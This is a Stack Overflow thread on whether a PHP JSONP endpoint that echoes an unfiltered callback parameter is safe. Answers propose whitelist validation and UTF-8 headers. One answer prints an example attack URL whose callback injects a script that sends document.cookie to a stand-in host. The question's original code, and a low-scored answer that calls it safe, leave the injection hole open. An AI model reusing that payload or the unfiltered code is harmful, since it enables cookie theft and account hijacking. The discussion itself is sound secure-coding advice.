# Is this safe for providing JSONP?

Tags: php, javascript, jsonp

```
<?php header('content-type: application/json');

$json = json_encode($data);

echo isset($_GET['callback'])
    ? "{$_GET['callback']}($json)"
    : $json;
```

Or should I for example filter the `$_GET['callback']` variable so that it only contains a valid JavaScript function name? If so, what are valid JavaScript function names?

Or is not filtering that variable a bit of the point with JSONP?

---

**Current solution:** Blogged about my current solution at http://www.geekality.net/?p=1021. In short, for now, I have the following code, which hopefully should be pretty safe:

```
<?php header('content-type: application/json; charset=utf-8');

function is_valid_callback($subject)
{
     $identifier_syntax
       = '/^[$_\p{L}][$_\p{L}\p{Mn}\p{Mc}\p{Nd}\p{Pc}\x{200C}\x{200D}]*+$/u';

     $reserved_words = array('break', 'do', 'instanceof', 'typeof', 'case',
       'else', 'new', 'var', 'catch', 'finally', 'return', 'void', 'continue', 
       'for', 'switch', 'while', 'debugger', 'function', 'this', 'with', 
       'default', 'if', 'throw', 'delete', 'in', 'try', 'class', 'enum', 
       'extends', 'super', 'const', 'export', 'import', 'implements', 'let', 
       'private', 'public', 'yield', 'interface', 'package', 'protected', 
       'static', 'null', 'true', 'false');

     return preg_match($identifier_syntax, $subject)
         && ! in_array(mb_strtolower($subject, 'UTF-8'), $reserved_words);
}

$data = array(1, 2, 3, 4, 5, 6, 7, 8, 9);
$json = json_encode($data);

# JSON if no callback
if( ! isset($_GET['callback']))
     exit( $json );

# JSONP if valid callback
if(is_valid_callback($_GET['callback']))
     exit( "{$_GET['callback']}($json)" );

# Otherwise, bad request
header('Status: 400 Bad Request', true, 400);
```

Comment: Since JSONP is actually Javascript, the mime type would be `text/javascript` (or `application/javascript`).

Comment: @Casey: Oh, so I should set the content type to `application/json` if callback is not set, and to `application/javascript` if it is?

Comment: Theoretically, yes, but I don't think many browsers actually pay attention to mime type. :)

Comment: @zuallauz It's not rejecting function names which contain those words, only those which are equal.

Comment: The preg_match there doesn't allow for a name spaced callbacks. Here is a regex that will: `$identifier_syntax
      = '/^[$_\p{L}\.][$_\p{L}\p{Mn}\p{Mc}\p{Nd}\p{Pc}\x{200C}\x{200D}\.]*+$/u';`

Comment: @jkinz Is it an added `\.` in both brackets you've added? Callbacks aren't allowed to *start* with a period, are they?

Comment: @Svish: You're correct, here is the new corrected version:

`$identifier_syntax = '/^[$_\p{L}][$_\p{L}\p{Mn}\p{Mc}\p{Nd}\p{Pc}\x{200C}\x{200D}\.]*+$/u';`

Answer (score 17, accepted):

No, if you intend to limit the JSONP to select domains. Specify the encoding too or people who shouldn't be able to access the JSON can possibly do UTF-7 injection attacks. Use this header instead:

```
header('Content-Type: application/json; charset=utf-8');
```

If it's supposed to be a public JSONP service, then yes it is safe, and also use `application/javascript` instead of `application/json`.

Comment: Ooh, never heard about that before. Think I'll def specify the encoding!

Comment: Except for a JSONP response you should use application/javascript rather than application/json seeing as JSONP is actually javascript code.

Comment: It's not necessarily safe. JSONP works on the principle of setting data or calling a function, not the ability to inject code in the JSONP server's context. Hence he *must* filter out the callback name.

Answer (score 9):

To be safe, you should encode `callback` to only allow valid JS function names. Nothing complex, just don't allow end-developers to inject *any* javascript.
Here's some code:

```
<?php

    header('Content-Type: application/json; charset=utf-8'); // Thanks Eli

    /**
     * Ensures that input string matches a set of whitelisted characters and
     * replaces unlisted ones with a replacement string (defaults to underscore).
     * @param string $orig The original text to filter.
     * @param string $replace The replacement string (default is underscore).
     * @param string The original text with bad characters replaced with $replace.
     * @link https://github.com/uuf6429/K2F/blob/master/K2F-DEV/core/security.php#L263
     */
    function strtoident($orig,$replace=''){
        $orig=(string)$orig;                  // ensure input is a string
        for($i=0; $i<strlen($orig); $i++){
            $o=ord($orig{$i});
            if(!(  (($o>=48) && ($o<=57))     // numbers
                || (($o>=97) && ($o<=122))    // lowercase
                || (($o>=65) && ($o<=90))     // uppercase
                || ($orig{$i}=='_')))         // underscore
                   $orig{$i}=$replace;        // check failed, use replacement
        }
        return $orig;
    }

    $json=json_encode($data)

    echo isset($_GET['callback'])
        ? strtoident($_GET['callback']).'('.$json.');'
        : $json;

?>
```

**Edit:**

The reason is to avoid hackers pointing innocent victims to:

```
http://yoursite.com/jsonp.php?callback=(function(){ $(document.body).append('<script type="text/javascript" src="http://badsite.com/?usercookies='+document.cookie+'"></script>'); })//
```

Which can be broken down to:

```
(function(){
    $(document.body).append(
        '<script type="text/javascript" src="http://badsite.com/?usercookies='+document.cookie+'"></script>'
    );
})//("whatever");
```

With the latter part being the json you encoded, easily cancelled out with a comment (though unnecessary for their exploit to work).
Basically, the hacker gets to know the user's cookies (among other things) which helps him gain access to the user's account with your website.

**Edit:** UTF-8 Compatibility. In order to substantiate my claims, [read here](http://en.wikipedia.org/wiki/UTF-8). Or:

> Like UTF-16 and UTF-32, UTF-8 can represent every character in the Unicode character set. Unlike them, it is backward-compatible with ASCII and avoids the complications of endianness and byte order marks (BOM).

Comment: You may also need to allow periods, if you have namespaced functions.

Comment: @Svish - The function itself works with ASCII set only. So, if you're on UTF-8, only basic characters are supported (since "A" in ASCII == "A" in UTF-8). If the OP wants more characters, he should just change the function.
JW - I can't be 100% sure it couldn't cause additional trouble. The OP should add this at his own risk (and/or perhaps ask other people as well).

Comment: I am the OP, and that's why I asked :p I totally see that it's a good idea to do some filtering there though. And I suppose weird characters wouldn't really be an issue anyways since it's only a few specific characters that would make any difference in JavaScript?

Comment: *I am the OP, and that's why I asked :p* whoopsies :P Regarding the rest, yes. Just be sure the strange characters are ok.

Comment: Would it perhaps be better to use a blacklist instead of a whitelist in this case? Or would it be too long a list of JavaScript things to maintain?

Comment: @Svish - Blacklists are a common issue in security; you just can't cover all possible blacklist issues.

Comment: Yeah, that's what I was afraid of. Maybe I'll just attack the ecmascript specification...

Comment: object["property"] is a valid JavaScript function reference. What if  "property" was "<script..." ?

Comment: @DanMarshall I'm not sure how that fits in the code above...? Also, the `Content-Type` header should help against what you described.

Answer (score 2):

I think it is safe. As long as you do not echo $_GET['callback'] in another page without escaping. The one who does the request can put whatever js he wants in it, I think it will always be his problems, not yours. This page provides the definition of a valid js function name : http://www.functionx.com/javascript/Lesson05.htm